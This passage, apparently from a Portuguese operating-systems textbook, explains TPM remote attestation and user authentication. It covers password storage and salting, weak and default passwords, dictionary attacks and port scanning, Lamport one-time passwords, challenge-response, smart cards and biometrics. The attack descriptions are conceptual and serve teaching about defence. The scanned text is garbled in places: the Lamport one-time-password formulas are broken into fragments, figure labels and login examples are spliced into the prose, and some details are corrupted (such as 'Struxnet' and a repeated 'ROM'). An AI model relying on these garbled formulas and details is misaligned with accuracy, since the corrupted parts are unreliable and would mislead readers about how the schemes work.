executando um software bootloader confiável e não al- 
gum malicioso, isso seria um começo. Se pudéssemos 
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provar adicionalmente que executávamos um núcleo 
legítimo nesse software confiável, melhor ainda. E se 
pudéssemos, por fim, mostrar que nesse núcleo execu- 
távamos a versão certa de uma aplicação legitima, o ter- 
ceiro investigando poderia ficar satisfeito em relação a 
nossa confiabilidade. 

Vamos primeiro considerar o que acontece em nossa 
máquina, a partir do momento que ela inicializa. Quan- 
do o BIOS (confiável) inicializa, ele primeiro inicializa 
o TPM e o utiliza para criar um resumo criptográfico do 
código na memória após carregar o bootloader. O TPM 
escreve o resultado em um registrador especial, conhe- 
cido como PCR (Platform Configuration Register — 
Registrador de configuração de plataforma). Os PCRs 
são especiais porque eles não podem ser sobrescritos 
diretamente — mas apenas “estendidos”. Para estender 
o PCR, o TPM pega um resumo criptográfico da com- 
binação do valor de entrada e o valor anterior no PCR, e 
armazena isso no PCR. Desse modo, se nosso bootloader 
for benigno, ele gerará uma medida (criar um resumo) 
para o núcleo carregado e estenderá o PCR que antes 
continha a medida para o bootloader em si. Intuitivamen- 
te, podemos considerar o resumo criptográfico resultante 
no PCR como uma cadeia de resumo, que liga o núcleo 
ao bootloader. Agora o núcleo, por sua vez, toma uma 
medida da aplicação e estende o PCR com isso. 

Agora vamos considerar o que acontece quando um 
terceiro externo quer verificar se estamos executando a 
pilha de software (confiável) certa, e não algum outro 
código arbitrário. Primeiro, a parte investigando cria 
um valor imprevisível de, por exemplo, 160 bits. Esse 
valor, conhecido com um nonce, é simplesmente um 
identificador único para essa solicitação de verificação. 
Ele serve para evitar que um atacante grave a respos- 
ta a uma solicitação de atestação remota, mudando a 
configuração da parte que atesta e então apenas repro- 
duzindo a resposta anterior para todas as solicitações 
de atestação subsequentes. Ao incorporar um nonce no 
protocolo, esse tipo de replay não é possível. Quando 
o lado atestando recebe a solicitação de atestação (com o 
nonce), ele usa o TPM para criar uma assinatura (com 
sua chave única e não forjável) para a concatenação do 
nonce e o valor do PCR. Ele então envia de volta sua 
assinatura, o nonce, o valor do PCR e resumos para o 
bootloader, o núcleo e a aplicação. A parte que inves- 
tiga verifica primeiro a assinatura e o nonce. Em se- 
guida, ela examina os três resumos em seu banco de 
dados de bootloaders, núcleos e aplicações confiáveis. 
Se eles não estiverem lá, a atestação falhará. De outra 
maneira, a parte investigando recria o resumo combina- 
do de todos os três componentes e os compara ao valor 
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do PCR recebido do lado atestador. Se os valores ca- 
sarem, o lado investigador terá certeza de que o lado 
atestador foi inicializado com exatamente aqueles três 
componentes. O resultado sinalizado evita que atacan- 
tes forjem o resultado, e tendo em vista que sabemos que 
o bootloader confiável realiza a medida apropriada do 
núcleo e o núcleo por sua vez mede a aplicação, nenhu- 
ma outra configuração de código poderia ter produzido 
a mesma cadeia de resumo. 

O TPM tem uma série de outros usos a respeito dos 
quais não temos espaço para nos aprofundarmos. De 
maneira bastante interessante, uma coisa que o TPM 
não faz é tornar os computadores mais seguros con- 
tra ataques externos. O seu foco realmente é utilizar a 
criptografia para evitar que os usuários façam qualquer 
coisa que não seja aprovada direta ou indiretamente por 
quem quer que controle o TPM. Se você quiser apren- 
der mais sobre esse assunto, o artigo sobre Computação 
Confiável (Trusted Computing) na Wikipédia é um bom 
ponto de partida. 


9.6 Autenticação 


Todo sistema computacional seguro deve exigir que 
todos os usuários sejam autenticados no momento do 
login. Afinal de contas, se o sistema operacional não 
pode certificar-se de quem é o usuário, ele não pode 
saber quais arquivos e outros recursos ele pode aces- 
sar. Embora a autenticação possa soar como um assunto 
trivial, ela é um pouco mais complicada do que você 
poderia esperar. Vamos em frente. 

A autenticação de usuário é uma daquelas coisas 
que quisemos dizer com “a ontogenia recapitula a filo- 
genia” na Seção 1.5.7. Os primeiros computadores de 
grande porte, como o ENIAC, não tinham um sistema 
operacional, muito menos uma rotina de login. Mais 
tarde, sistemas de tempo compartilhado e computado- 
res de grande porte em lote (mainframe batch) tinham 
em geral uma rotina de login para autenticar trabalhos 
e usuários. 

Os primeiros microcomputadores (por exemplo, PDP- 
-1 e PDP-8) não tinham uma rotina de login, mas com a 
disseminação do UNIX e do minicomputador PDP-11, 
o login tornou-se novamente necessário. Os primeiros 
computadores pessoais (por exemplo, o Apple II e o PC 
IBM original) não tinham uma rotina de login, mas siste- 
mas operacionais de computadores pessoais mais sofisti- 
cados, como o Linux e o Windows 8, têm. Máquinas em 
LANs corporativas quase sempre têm uma rotina de lo- 
gin configurada de maneira que os usuários não possam 


evitá-la. Por fim, muitas pessoas hoje em dia se conec- 
tam (indiretamente) a computadores remotos para fazer 
Internet banking, realizar compras por meio eletrônico, 
baixar música e outras atividades comerciais. Todas es- 
sas coisas exigem o login autenticado, de maneira que 
a autenticação de usuários é mais uma vez um tópico 
importante. 

Tendo determinado que a autenticação é muitas ve- 
zes importante, o passo seguinte é encontrar uma boa 
maneira de alcançá-la. A maioria dos métodos de au- 
tenticação de usuários quando eles fazem uma tentativa 
de login são baseadas em três princípios gerais, a saber, 
identificar 


1. Algo que o usuário conhece. 
2. Algo que o usuário tem. 
3. Algo que o usuário é. 


Às vezes dois desses são necessários para segurança 
adicional. Esses princípios levam a diferentes esquemas 
de autenticação com diferentes complexidades e pro- 
priedades de segurança. Nas seções a seguir examina- 
remos cada um deles. 

A forma de autenticação mais amplamente usada 
é exigir que o usuário digite um nome de login e uma 
senha. A proteção de senha é fácil de compreender e 
de implementar. A implementação mais simples ape- 
nas mantém uma lista central de pares (nome de login, 
senha). O nome de login digitado é procurado na lista 
e a senha digitada é comparada à senha armazenada. 
Se elas casarem, o login é permitido; se não, o login é 
rejeitado. 

É desnecessário dizer que enquanto uma senha está 
sendo digitada, o computador não deve exibir os carac- 
teres digitados, para mantê-los longe de olhos bisbilho- 
teiros próximos do monitor. Com Windows, à medida 
que cada caractere é digitado, um asterisco é exibido. 
Com UNIX, nada é exibido enquanto a senha está sendo 
digitada. Esses esquemas têm diferentes propriedades. 
O esquema do Windows pode facilitar para usuários 
distraídos verem quantos caracteres eles já digitaram, 
mas ele também revela o comprimento da senha para 
“bisbilhoteiros”. Do ponto de vista da segurança, o si- 
léncio vale ouro. 

Outra área na qual essa questão tem sérias implica- 
ções de segurança é ilustrada na Figura 9.17. Na Figu- 
ra 9.17(a), um login bem-sucedido é mostrado, com a 
saída do sistema em letras maiúsculas e a entrada do 
usuário em letras minúsculas. Na Figura 9.17(b), uma 
tentativa fracassada por um cracker de fazer um login 
no Sistema 4 é mostrada. Na Figura 9.17(c) uma tentati- 
va fracassada por um cracker de fazer login no Sistema 
B é mostrada. 
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alelo TEATA (a) Um login bem-sucedido. (b) Login rejeitado após nome ser inserido. (c) Login rejeitado após nome e senha serem digitados. 


LOGIN: mauro 
SENHA: qualquer 


LOGIN COM SUCESSO LOGIN: 


(a) 


Na Figura 9.17(b), o sistema reclama tão logo ele vê 
um nome de login inválido. Isso é um erro, uma vez que 
ele permite que um cracker siga tentando logar nomes 
até encontrar um válido. Na Figura 9.17(c), é sempre 
pedido ao cracker uma senha e ele não recebe um retor- 
no sobre se o nome do login em si é válido. Tudo o que 
ele fica sabendo é que o nome do login mais a combina- 
ção da senha tentados estão errados. 

Como uma nota sobre rotinas de login, a maioria dos 
notebooks é configurada de maneira a exigir um nome 
de login e senha para proteger seus conteúdos caso se- 
jam perdidos ou roubados. Embora melhor do que nada, 
não é muito melhor. Qualquer pessoa que pegar um no- 
tebook, ligá-lo e imediatamente ir para o programa de 
configuração BIOS acionando DEL ou F8 ou alguma 
outra tecla específica do BIOS (em geral exibida na 
tela) antes que o sistema operacional seja inicializado. 
Uma vez ali, ela pode mudar a sequência de inicializa- 
ção, dizendo-o para inicializar a partir de um pen-drive 
antes de tentar o disco rígido. Essa pessoa então insere 
um pen-drive contendo um sistema operacional com- 
pleto e o inicializa a partir dele. Uma vez executando, o 
disco rígido pode ser montado (em UNIX) ou acessado 
como D: drive (Windows). Para evitar essa situação, a 
maioria dos BIOS permite que o usuário proteja com 
senha seu programa de configuração BIOS de manei- 
ra que apenas o proprietário possa mudar a sequência 
de inicialização. Se você tem um notebook, pare de ler 
agora. Vá colocar uma senha no seu BIOS, então volte. 


Senhas fracas 


Muitas vezes, crackers realizam seu ataque apenas 
conectando-se ao computador-alvo (por exemplo, via 
internet) e tentando muitas combinações (nome de lo- 
gin, senha) até encontrarem uma que funcione. Muitas 
pessoas usam seu nome de uma forma ou outra como 
seu nome de login. Para alguém chamado “Ellen Ann 
Smith”, ellen, smith, ellen smith, ellen-smith, ellen. 
smith, esmith, easmith e eas são todos candidatos razo- 
áveis. Armado com um desses livros intitulados 4096 


LOGIN: carolina 
NOME INVÁLIDO 


(b) 


LOGIN: carolina 
SENHA: umdois 
LOGIN INVÁLIDO 


LOGIN: 
(c) 


Nomes para o seu novo bebê, mais uma lista telefôni- 
ca cheia de sobrenomes, um cracker pode facilmente 
compilar uma lista computadorizada de nomes de login 
potenciais apropriados para o país sendo atacado (el- 
len smith pode funcionar bem nos Estados Unidos ou 
Inglaterra, mas provavelmente não no Japão). 

É claro, adivinhar o nome do login não é o suficien- 
te. A senha tem de ser adivinhada, também. Quão difícil 
é isso? Mais fácil do que você imagina. O trabalho clás- 
sico sobre segurança de senhas foi realizado por Morris 
e Thompson (1979) em sistemas UNIX. Eles compila- 
ram uma lista de senhas prováveis: nomes e sobreno- 
mes, nomes de ruas, nomes de cidades, palavras de um 
dicionário de tamanho moderado (também palavras so- 
letradas de trás para a frente), números de placas de car- 
ros etc. Então compararam sua lista com o arquivo de 
senhas do sistema para ver se algumas casavam. Mais 
de 86% de todas as senhas apareceram em sua lista. 

Para que ninguém pense que usuários de melhor 
qualidade escolhem senhas de melhor qualidade, esse 
com certeza não é o caso. Quando em 2012, 6,4 milhões 
resumos criptográficos de senhas do LinkedIn vazaram 
para a web após um ataque, muita gente se divertiu 
analisando os resultados. A senha mais popular era “se- 
nha”. A segunda mais popular era “123456” (“1234”, 
“12345” e “12345678” também estavam no top 10). 
Não exatamente invioláveis. Na realidade, crackers po- 
dem compilar uma lista de nomes de login potenciais 
e uma lista de senhas potenciais sem muito trabalho, e 
executar um programa para tentá-las em tantos compu- 
tadores quantos puderem. 

Isso é similar ao que os pesquisadores na IO Active fi- 
zeram em março de 2013. Eles varreram uma longa lista 
de roteadores e decodificadores (set-top boxes) para ver 
se eram vulneráveis ao tipo mais simples de ataque. Em 
vez de tentar muitos nomes de login e senhas, como su- 
gerimos, eles tentaram somente o login e senha padrões 
conhecidos instalados pelos fabricantes. Os usuários de- 
veriam mudar esses valores imediatamente, mas parece 
que muitos não o fazem. Os pesquisadores descobriram 
que centenas de milhares desses dispositivos são poten- 
cialmente vulneráveis. Talvez mais preocupante ainda, 
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o ataque Struxnet sobre a instalação nuclear iraniana fez 
uso do fato de os computadores Siemens que controlam 
a centrífuga terem usado uma senha padrão — uma que 
estava circulando na internet por anos. 

O crescimento da web tornou o problema muito pior. 
Em vez de ter apenas uma senha, muitas pessoas têm ago- 
ra dúzias ou mesmo centenas. Como lembrar-se de todas 
elas é difícil demais, elas tendem a escolher senhas sim- 
ples, fracas e reutilizá-las em muitos sites (FLORENCIO e 
HERLEY, 2007; e TAIABUL HAQUE et al., 2013). 

Faz realmente alguma diferença se as senhas são fa- 
ceis de adivinhar? Sim, com certeza. Em 1998, o San 
Jose Mercury News fez uma reportagem sobre um resi- 
dente de Berkeley, Peter Shipley, que havia configurado 
diversos computadores não utilizados como discadores 
de guerra, que discavam todos os 10 mil números de te- 
lefones pertencendo a uma área [por exemplo, (415) 770 
xxxx], normalmente em uma ordem aleatória para driblar 
as companhias de telefone que desaprovam esse tipo de 
uso e buscam detectá-lo. Após fazer 2,6 milhões de cha- 
madas, ele localizou 20 mil computadores na chamada 
Bay Area, 200 dos quais não tinham segurança alguma. 

A internet foi um presente dos deuses para os cra- 
ckers. Ela tirou toda a chateação do seu trabalho. Não há 
mais a necessidade de ligar para números de telefone (e 
menos ainda esperar pelo sinal). A “guerra de discagem” 
funciona agora assim. Um cracker pode escrever um ro- 
teiro ping (enviar um pacote de rede) para um conjun- 
to de endereços IP. Se não receber resposta alguma, o 
script subsequentemente tenta estabelecer uma conexão 
TCP com todos os serviços possíveis que possam estar 
executando na máquina. Como mencionado, esse ma- 
peamento do que está executando em qual computador 
é conhecido como varredura de porta (portscanning) e 
em vez de escrever um script do início, o invasor pode 
muito bem usar ferramentas especializadas como nmap 
que fornecem uma ampla gama de técnicas avançadas 
de varredura de porta. Agora que o invasor sabe quais 
servidores estão executando em qual máquina, o passo 
seguinte é lançar o ataque. Por exemplo, se o violador 
quisesse sondar a proteção da senha, ele se conectaria 
aqueles serviços que usam esse método de autenticação, 
como o servidor telnet, ou mesmo o servidor da web. Já 
vimos que uma senha fraca ou padrão capacita os ata- 
cantes a colher um grande número de contas, às vezes 
com todos os direitos do administrador. 


Segurança por senhas do UNIX 


Alguns sistemas operacionais (mais antigos) man- 
têm o arquivo de senha no disco na forma decriptada, 


mas protegido pelos mecanismos de proteção do siste- 
ma usuais. Ter todas as senhas em um arquivo de dis- 
co em forma decriptada é simplesmente procurar por 
problemas, pois seguidamente muitas pessoas têm aces- 
so a ele. Estas podem incluir administradores do siste- 
ma, operadores de máquinas, pessoal de manutenção, 
programadores, gerenciamento e talvez até algumas 
secretárias. 

Uma solução melhor, usada em sistemas UNIX, fun- 
ciona da seguinte forma. O programa de login pede ao 
usuário para digitar seu nome e senha. A senha é ime- 
diatamente “encriptada”, usando-a como uma chave 
para encriptar um bloco fixo de dados. Efetivamente, 
uma função de mão única está sendo executada, com a 
senha como entrada e uma função da senha como saída. 
Esse processo não é de fato criptografia, mas é mais fá- 
cil falar sobre ele como tal. O programa de login então 
lê o arquivo de senha, que é apenas uma série de linhas 
ASCH, uma por usuário, até encontrar a linha conten- 
do o nome de login do usuario. Se a senha (encriptada) 
contida nessa linha casa com a senha encriptada recém- 
-computada, o login é permitido, de outra maneira é re- 
cusado. A vantagem desse esquema é que ninguém, nem 
mesmo o superusuário, poderá procurar pelas senhas de 
qualquer usuário, pois elas não estão armazenadas de 
maneira encriptada em qualquer parte do sistema. Para 
fins de ilustração, presumimos por ora que a senha en- 
criptada é armazenada no próprio arquivo de senhas. 
Mais tarde, veremos que esse não é mais o caso para os 
modelos modernos do UNIX. 

Se o atacante consegue obter a senha encriptada, o 
esquema pode ser atacado como a seguir. Um cracker 
primeiro constrói um dicionário de senhas prováveis da 
maneira que Morris e Thompson fizeram. A seu tempo, 
elas são encriptadas usando o algoritmo conhecido. Não 
importa quanto tempo leva esse processo, pois ele é fei- 
to antes da invasão. Agora, armado com uma lista de 
pares (senha, senha encriptada), o cracker ataca. Ele lê 
o arquivo de senhas (publicamente acessível) e captura 
todas as senhas encriptadas. Para cada ataque, o nome 
de login e senha encriptadas são agora conhecidos. Um 
simples shell script pode automatizar esse processo de 
maneira que ele possa ser levado adiante em uma fração 
de segundo. Uma execução típica do script produzirá 
dúzias de senhas. 

Após reconhecer a possibilidade desse ataque, Mor- 
ris e Thompson descreveram uma técnica que torna o 
ataque quase inútil. Sua ideia é associar um número 
aleatório de n-bits, chamado sal, com cada senha. O 
número aleatório é modificado toda vez que a senha é 
modificada. Ele é armazenado no arquivo de senha na 


forma decriptada, de maneira que todos possam lê-lo. 
Em vez de apenas armazenar a senha criptografada no 
arquivo de senhas, a senha e o número aleatório são pri- 
meiro concatenados e então criptografados juntos. Esse 
resultado criptografado é então armazenado no arquivo 
da senha, como mostrado na Figura 9.18 para um arqui- 
vo de senha com cinco usuários, Bobbie, Tony, Laura, 
Mark e Deborah. Cada usuário tem uma linha no ar- 
quivo, com três entradas separadas por vírgulas: nome 
do login, sal e senha + sal encriptadas + sal. A notação 
e(Dog, 4238) representa o resultado da concatenação 
da senha de Bobbie, Dog, com seu sal aleatoriamen- 
te designado, 4239, e executando-o através da função 
criptográfica, e. É o resultado da encriptação que é ar- 
mazenado como o terceiro campo da entrada de Bobbie. 

Agora considere as implicações para um cracker que 
quer construir uma lista de senhas prováveis, criptogra- 
fá-las e salvar os resultados em um arquivo ordenado, 
f, de maneira que qualquer senha criptografada possa 
ser encontrada facilmente. Se um intruso suspeitar que 
Dog possa ser a senha, não basta mais criptografar Dog 
e colocar o resultado em f. Ele tem de criptografar 2” ca- 
deias, como Dog0000, Dog0001, Dog0002, e assim por 
diante e inseri-las todas em f. Essa técnica aumenta o 
tamanho de f por 2”. UNIX usa esse método com n = 12. 

Para segurança adicional, versões modernas do 
UNIX tipicamente armazenam as senhas criptografadas 
em um arquivo “sombra” em separado que, ao contrá- 
rio do arquivo senha, é legível apenas pelo usuário 
root. A combinação do uso do sal no arquivo de senhas 
e torná-lo ilegível exceto indiretamente (e lentamente) 
pode em geral suportar a maioria dos ataques sobre ele. 


eTR] O uso do sal para derrotar a pré-computação de 
senhas criptografadas. 





Barbara, 4238, e(Dog, 4238) 
Tony, 2918, e(6%%TaeFF, 2918) 
Laura, 6902, e(Shakespeare, 6902) 
Mark, 1694, e(XaB#Bwcz, 1694) 
Deborah, 1092, e(LordByron,1092) 























Senhas de uso único 


A maioria dos superusuários encoraja seus usuários 
mortais a mudar suas senhas uma vez ao mês, o que é 
ignorado. Ainda mais extremo é modificar a senha com 
cada login, levando a senhas de uso único. Quando se- 
nhas de uso único são utilizadas, o usuário recebe um 
livro contendo uma lista de senhas. Cada login usa a 
próxima senha na lista. Se um intruso descobrir um dia 
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uma senha, isso não vai ajudá-lo muito, pois da próxima 
vez uma senha diferente será usada. Sugere-se ao usuá- 
rio que ele evite perder o livro de senhas. 

Na realidade, um livro não é necessário por causa 
de um esquema elegante desenvolvido por Leslie Lam- 
port que permite que um usuário se conecte de maneira 
segura por uma rede insegura utilizando senhas de uso 
único (LAMPORT, 1981). O método de Lamport pode 
ser usado para permitir que um usuário executando em 
um PC em casa conecte-se a um servidor na internet, 
mesmo que intrusos possam ver e copiar todo o tráfe- 
go em ambas as direções. Além disso, nenhum segredo 
precisa ser armazenado no sistema de arquivos tanto do 
servidor quanto do usuário do PC. O método é às vezes 
chamado de cadeia de resumos de mão única. 

O algoritmo é baseado em uma função de mão 
única, isto é, uma função y = f(x) cuja propriedade é: 
dado x, é fácil de encontrar y, mas dado y, é computa- 
cionalmente impossível encontrar x. A entrada e a sa- 
ida devem ser do mesmo comprimento, por exemplo, 
256 bits. 

O usuário escolhe uma senha secreta que ele memo- 
riza. Ele também escolhe um inteiro, n, que é quantas 
senhas de uso único o algoritmo for capaz de memori- 
zar. Como exemplo, considere n = 4, embora na prática 
um valor muito maior de n seria usado. Se a senha se- 
creta for s, a primeira senha é dada executando a função 
de mão única n vezes: 


P 5S ULE 


A segunda senha é dada executando a função de mão 
única n — | vezes: 


P, =F) 


A terceira senha executa f duas vezes e a quarta se- 
nha o executa uma vez. Em geral, P,_, =f (P). O fato 
fundamental a ser observado aqui é que dada qualquer 
senha na sequência, é fácil calcular a senha anterior na 
sequência numérica, mas impossível de calcular a se- 
guinte. Por exemplo, dado P, é fácil encontrar P , mas 
impossível encontrar P.. 

O servidor é inicializado com P,, que é simplesmen- 
te f(P,). Esse valor é armazenado na entrada do arquivo 
de senhas associado com o nome de login do usuário 
juntamente com o inteiro 1, indicando que a próxima 
senha necessária é P,. Quando o usuário quer conectar- 
-se pela primeira vez, ele envia seu nome de login para 
o servidor, que responde enviando o inteiro no arquivo 
de senha, 1. A máquina do usuário responde com P,, 
que pode ser calculado localmente a partir de s, que é 
digitado no próprio local. O servidor então calcula f(P ) 
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e compara isso com o valor armazenado no arquivo de 
senha (P,). Se os valores casarem, o login é permitido, 
o inteiro é incrementado para 2, e P, sobrescreve P, no 
arquivo de senhas. 

No login seguinte, o servidor envia ao usuário um 
2, e a maquina do usuário calcula P,. O servidor então 
calcula f(P,) e o compara com a entrada no arquivo de 
senhas. Se os valores casarem, o login é permitido, o 
inteiro é incrementado para 3, e P, sobrescreve P, no 
arquivo de senha. A propriedade que faz esse esquema 
funcionar é que embora um intruso possa capturar P, 
ele não tem como calcular P.,, a partir dele, somente 
P._, que já foi usado e agora não vale mais nada. Quan- 
do todas as senhas n tiverem sido usadas, o servidor é 
reinicializado com uma nova chave secreta. 


Autenticação por resposta a um desafio 


Uma variação da ideia da senha é fazer com que 
cada novo usuário forneça uma longa lista de pergun- 
tas e respostas que são então armazenadas no servidor 
com segurança (por exemplo, de forma criptografada). 
As perguntas devem ser escolhidas de maneira que o 
usuário não precise anotá-las. Perguntas possíveis que 
poderiam ser feitas: 


1. Quem é a irmã de Mariana? 
2. Em qual rua ficava sua escola primária”? 
3. O que a Sra. Ellis ensinava? 


No login, o servidor faz uma dessas perguntas aleato- 
riamente e confere a resposta. Para tornar esse esquema 
prático, no entanto, muitos pares de questões-respostas 
seriam necessários. 

Outra variação é o desafio-resposta. Quando isso é 
usado, o usuário escolhe um algoritmo quando se re- 
gistrando como um usuário, por exemplo, x”. Quando o 
usuário faz o login, o servidor envia a ele um argumento, 
digamos 7, ao que o usuário digita 49. O algoritmo pode 
ser diferente de manhã e de tarde, em dias diferentes da 
semana, e por aí afora. 

Se o dispositivo do usuário tiver potência computa- 
cional real, com um computador pessoal, um assistente 
digital pessoal, ou um telefone celular, uma forma de 
desafio-resposta mais potente pode ser usada. O usuário 
escolhe de antemão uma chave secreta, k, que é de início 
inserida no sistema servidor manualmente. Uma cópia 
também é mantida (de maneira segura) no computador 
do usuário. No momento do login, o servidor envia um 
número aleatório, r, para o computador do usuário, que 
então calcula f(z, k) e envia isso de volta, onde f é uma 
função conhecida publicamente. O servidor faz então 


ele mesmo a computação e verifica se o resultado en- 
viado de volta concorda com a computação. A vanta- 
gem desse esquema sobre uma senha é que mesmo que 
um bisbilhoteiro veja e grave todo o tráfego em ambas 
as direções, ele não vai aprender nada que o ajude da 
próxima vez. É claro, a função, f, tem de ser complicada 
o suficiente para que k não possa ser deduzido, mesmo 
recebendo um grande conjunto de observações. Fun- 
ções de resumo criptográfico são boas escolhas, com o 
argumento sendo o XOR de r e k. Essas funções são 
conhecidas por serem difíceis de reverter. 


9.6.1 Autenticação usando um objeto físico 


O segundo método para autenticar usuários é verifi- 
car algum objeto físico que eles tenham em vez de algo 
que eles conheçam. Chaves de metal para portas foram 
usadas por séculos para esse fim. Hoje, o objeto físico 
usado é muitas vezes um cartão plástico que é inserido 
em um leitor associado com o computador. Em geral, o 
usuário deve não só inserir o cartão, mas também digitar 
uma senha para evitar que alguém use um cartão perdi- 
do ou roubado. Visto dessa maneira, usar uma máquina 
de atendimento automático (ATM) de um banco começa 
com o usuário conectando-se ao computador do banco 
por um terminal remoto (a máquina ATM automática) 
usando um cartão plástico e uma senha (atualmente um 
código PIN de 4 dígitos na maioria dos países, mas isso 
é apenas para evitar o gasto de colocar um teclado intei- 
ro na máquina ATM automática). 

Cartões de plástico contendo informações vêm em 
duas variedades: cartões com uma faixa magnética e 
cartões com chip. Cartões com faixa magnética contêm 
em torno de 140 bytes de informações escritas em um 
pedaço de fita magnética colada na parte de trás. Essa 
informação pode ser lida pelo terminal e então enviada 
para um computador central. Muitas vezes, a informa- 
ção contém a senha do usuário (por exemplo, código 
PIN), de maneira que o terminal possa desempenhar 
uma conferência de identidade mesmo que o link para 
o computador principal tenha caído. A senha típica é 
criptografada por uma senha conhecida somente pelo 
banco. Esses cartões custam em torno de US$ 0,10 a 
US$ 0,50, dependendo se há um adesivo holográfico na 
frente e do volume de produção. Como uma maneira de 
identificar usuários em geral, cartões com faixa magné- 
tica são arriscados, pois o equipamento para ler e escre- 
ver neles é barato e difundido. 

Cartões com chip contêm um minúsculo circuito 
integrado (chip). Podem ser subdivididos em duas ca- 
tegorias: cartões com valores armazenados e cartões 


inteligentes. Cartões com valores armazenados con- 
têm uma pequena quantidade de memória (normalmen- 
te menos do que 1 KB) usando tecnologia ROM para 
permitir que o valor seja lembrado quando o cartão é 
removido do leitor e, desse modo, a energia desligada. 
Não há CPU no cartão, então o valor armazenado deve 
ser modificado por uma CPU externa (no leitor). Esses 
cartões são produzidos em massa aos milhões por bem 
menos de US$ 1 e são usados, por exemplo, como car- 
tões telefônicos pré-pagos. Quando uma ligação é feita, 
o telefone apenas reduz o valor no cartão, mas nenhum 
dinheiro muda de fato de mãos. Por essa razão, esses 
cartões são geralmente emitidos por uma empresa para 
usar apenas em suas máquinas (por exemplo, telefones 
ou máquinas de venda). Eles poderiam ser usados para 
autenticação de usuários ao armazenar uma senha de 
1 KB que seria enviada pelo leitor para o computador 
central, mas isso raramente é feito. 

No entanto, hoje, muito do trabalho em segurança 
é focado nos cartões inteligentes que atualmente têm 
algo como uma CPU de 8 bits e 4 MHz, 16 KB de 
ROM, 4 KB de ROM, 512 bytes de RAM e um canal 
de comunicação de 9600 bps para o leitor. Os cartões 
estão ficando mais inteligentes com o passar do tempo, 
mas são restritos de uma série de maneiras, incluindo a 
profundidade do chip (porque ele está embutido no car- 
tão), a largura do chip (para que ele não quebre quando 
o usuário flexionar o cartão) e o custo (em geral US$ 1 
a US$ 20, dependendo da potência da CPU, tamanho da 
memória e presença ou ausência de um coprocessador 
criptográfico). 

Os cartões inteligentes podem ser usados para conter 
dinheiro, da mesma maneira que nos cartões de valor 
armazenado, mas com uma segurança e universalidade 
muito melhores. Os cartões podem ser carregados com 
dinheiro em uma máquina ATM ou em casa via tele- 
fone usando um leitor especial fornecido pelo banco. 
Quando inserido no leitor de um comerciante, o usuá- 
rio pode autorizar o cartão a deduzir uma determinada 
quantidade de dinheiro (digitando SIM), fazendo com 
que o cartão envie uma pequena mensagem criptografa- 
da para o comerciante. O comerciante pode mais tarde 
passar a mensagem para um banco para ser creditado 
pelo montante pago. 

A grande vantagem dos cartões inteligentes sobre, 
digamos, cartões de crédito ou débito, é que eles não 
precisam de uma conexão on-line para um banco. Se 
você não acredita que isso seja uma vantagem, tente o 
exemplo a seguir. Experimente comprar uma única bar- 
ra de chocolate em um mercado e insista em pagar com 
um cartão de crédito. Se o comerciante não aceitar o 
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seu cartão, diga que você não tem dinheiro consigo e 
além disso, você precisa das suas milhas de passageiro 
frequente. Você descobrirá que o comerciante não está 
entusiasmado com a ideia (porque os custos associados 
acabam com o lucro sobre o item). Isso torna os car- 
tões inteligentes úteis para pequenas compras em lojas, 
parquímetros, máquinas de venda e muitos outros dis- 
positivos que costumam exigir moedas. Eles são ampla- 
mente usados na Europa e espalham-se por toda parte. 

Cartões inteligentes têm muitos outros usos poten- 
cialmente valiosos (por exemplo, codificar as alergias e 
outras condições médicas do portador de uma maneira 
segura para uso em emergências), mas este não é o lugar 
para contar essa história. Nosso interesse aqui está em 
como eles podem ser usados para realizar uma auten- 
ticação de login segura. O conceito básico é simples: 
um cartão inteligente é um computador pequeno à pro- 
va de violação que pode engajar-se em uma discussão 
(protocolo) com um computador central para autenticar 
o usuário. Por exemplo, um usuário querendo comprar 
coisas em um site de comércio eletrônico poderia inse- 
rir um cartão inteligente em um leitor caseiro ligado ao 
seu PC. O site de comércio eletrônico não apenas usa- 
ria o cartão inteligente para autenticar o usuário de uma 
maneira mais segura do que uma senha, mas também 
poderia deduzir o preço de compra do cartão inteligen- 
te diretamente, eliminando uma porção significativa da 
sobrecarga (e risco) associados com o uso de um cartão 
de crédito para compras on-line. 

Vários esquemas de autenticação podem ser usados 
com um cartão inteligente. Um esquema de desafio- 
-resposta particularmente simples funciona da seguinte 
forma: o servidor envia um número aleatório de 512 bits 
para o cartão inteligente, que então acrescenta a senha 
de 512 bits do usuário armazenada na ROM do cartão 
para ele. A soma é então elevada ao quadrado e os 512 
bits do meio são enviados de volta para o servidor, que 
sabe a senha do usuário e pode calcular se o resultado 
está correto ou não. A sequência é mostrada na Figura 
9.19. Se um bisbilhoteiro vir ambas as mensagens, não 
será capaz de fazer muito sentido delas, e gravá-las para 
um uso futuro não faz sentido, pois no próximo login, 
um número aleatório de 512 bits diferente será envia- 
do. É claro, pode ser usado um algoritmo muito mais 
complicado do que elevá-lo ao quadrado, e é isso que 
sempre acontece. 

Uma desvantagem de qualquer protocolo criptográ- 
fico fixo é que, com o passar do tempo, ele poderia ser 
violado, inutilizando o cartão inteligente. Uma maneira 
de evitar esse destino é usar o ROM no cartão não para 
protocolo criptográfico, mas para um interpretador Java. 
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O protocolo criptográfico real é então baixado para o 
cartão como um programa binário Java e executado de 
maneira interpretativa. Assim, tão logo um protocolo 
é violado, um protocolo novo pode ser instalado mun- 
do afora de uma maneira direta: da próxima vez que 
o cartão for usado, um novo software é instalado nele. 
Uma desvantagem dessa abordagem é que ela torna um 
cartão já lento mais lento ainda, mas à medida que a 
tecnologia evolui, esse método torna-se muito flexi- 
vel. Outra desvantagem dos cartões inteligentes é que 
um cartão perdido ou roubado pode estar sujeito a um 
ataque de canal lateral, como um ataque de análise da 
alimentação de energia. Ao observar a energia elétrica 
consumida durante repetidas operações de criptografia, 
um especialista com o equipamento certo pode ser ca- 
paz de deduzir a chave. Medir o tempo para criptografar 
com várias chaves escolhidas especialmente também 
pode proporcionar informações valiosas sobre a chave. 


9.6.2 Autenticação usando biometria 


O terceiro método de autenticação mede as caracte- 
rísticas físicas do usuário que são difíceis de forjar. Elas 
são chamadas de biometria (BOULGOURIS et al., 
2010; e CAMPISI, 2013). Por exemplo, uma impressão 
digital ou leitor de voz conectado ao computador pode- 
ria verificar a identidade do usuário. 

Um sistema de biometria típico tem duas partes: ca- 
dastramento e identificação. Durante o cadastramento, 
as características do usuário são mensuradas e os resul- 
tados, digitalizados. Então características significativas 
são extraídas e armazenadas em um registro associado 
com o usuário. O registro pode ser mantido em um ban- 
co de dados central (por exemplo, para conectar-se em 
um computador remoto), ou armazenado em um cartão 
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inteligente que o usuário carrega consigo e insere em 
um leitor remoto (por exemplo, em uma máquina ATM). 

A outra parte é a identificação. O usuário aparece 
